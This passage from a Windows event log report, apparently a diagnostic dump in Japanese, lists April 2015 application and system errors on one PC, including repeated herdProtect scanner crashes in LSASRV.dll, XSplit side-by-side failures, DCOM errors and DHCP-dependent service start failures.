のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/19 18:45:13 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/19 22:13:43 | Computer Name = nametuki | Source = SideBySide | ID = 16842785
Description = "c:\program files (x86)\niwango\nicoliveenc\XSplitBroadcasterSrc.exe"
のアクティブ化コンテキストの生成に失敗しました。 従属アセンブリ Native.XSplitBroadcaster.exe,type="win32",version="1.0.0.0"
が見つかりませんでした。 詳細な診断を行うには sxstrace.exe を実行してください。

Error - 2015/04/20 9:03:50 | Computer Name = nametuki | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: herdProtectScan.exe、バージョン: 1.0.3.9、タイム スタンプ: 0x549300f9
障害が発生しているモジュール名:
LSASRV.dll、バージョン: 6.3.9600.17415、タイム スタンプ: 0x54504358 例外コード: 0xc0000005 障害オフセット:
0x000000000005036a 障害が発生しているプロセス ID: 0x8bc 障害が発生しているアプリケーションの開始時刻: 0x01d07b6a564bcd0f
障害が発生しているアプリケーション
パス: C:\Program Files\Reason\herdProtect\Scanner\herdProtectScan.exe 障害が発生しているモジュール
パス: C:\WINDOWS\SYSTEM32\LSASRV.dll レポート ID: afc9e3a0-e75d-11e4-bf32-eca86b234a79
障害が発生しているパッケージの完全な名前:
障害が発生しているパッケージに関連するアプリケーション ID:

Error - 2015/04/20 9:10:52 | Computer Name = nametuki | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: herdProtectScan.exe、バージョン: 1.0.3.9、タイム スタンプ: 0x549300f9
障害が発生しているモジュール名:
LSASRV.dll、バージョン: 6.3.9600.17415、タイム スタンプ: 0x54504358 例外コード: 0xc0000005 障害オフセット:
0x000000000005036a 障害が発生しているプロセス ID: 0xf34 障害が発生しているアプリケーションの開始時刻: 0x01d07b6b352d2fe2
障害が発生しているアプリケーション
パス: C:\Program Files\Reason\herdProtect\Scanner\herdProtectScan.exe 障害が発生しているモジュール
パス: C:\WINDOWS\SYSTEM32\LSASRV.dll レポート ID: ab411f5c-e75e-11e4-bf33-eca86b234a79
障害が発生しているパッケージの完全な名前:
障害が発生しているパッケージに関連するアプリケーション ID:

Error - 2015/04/20 10:46:19 | Computer Name = nametuki | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: herdProtectScan.exe、バージョン: 1.0.3.9、タイム スタンプ: 0x549300f9
障害が発生しているモジュール名:
LSASRV.dll、バージョン: 6.3.9600.17415、タイム スタンプ: 0x54504358 例外コード: 0xc0000005 障害オフセット:
0x000000000005036a 障害が発生しているプロセス ID: 0xf34 障害が発生しているアプリケーションの開始時刻: 0x01d07b6b352d2fe2
障害が発生しているアプリケーション
パス: C:\Program Files\Reason\herdProtect\Scanner\herdProtectScan.exe 障害が発生しているモジュール
パス: C:\WINDOWS\SYSTEM32\LSASRV.dll レポート ID: 010357d5-e76c-11e4-bf33-eca86b234a79
障害が発生しているパッケージの完全な名前:
障害が発生しているパッケージに関連するアプリケーション ID:

[ System Events ]
Error - 2015/04/20 12:45:25 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:47:02 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:47:12 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:54:11 | Computer Name = nametuki | Source = Service Control Manager | ID = 7001
Description = Network Location Awareness サービスは、次のエラーが原因で開始できなかった DHCP Client サービスに依存しています:
%%1068

Error - 2015/04/20 12:54:11 | Computer Name = nametuki | Source = Service Control Manager | ID = 7001
Description = Network List Service サービスは、次のエラーが原因で開始できなかった Network Location Awareness
サービスに依存しています: %%1068

Error - 2015/04/20 12:54:11 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:54:23 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:57:58 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:57:58 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =

Error - 2015/04/20 12:57:58 | Computer Name = nametuki | Source = DCOM | ID = 10005
Description =


< End of report >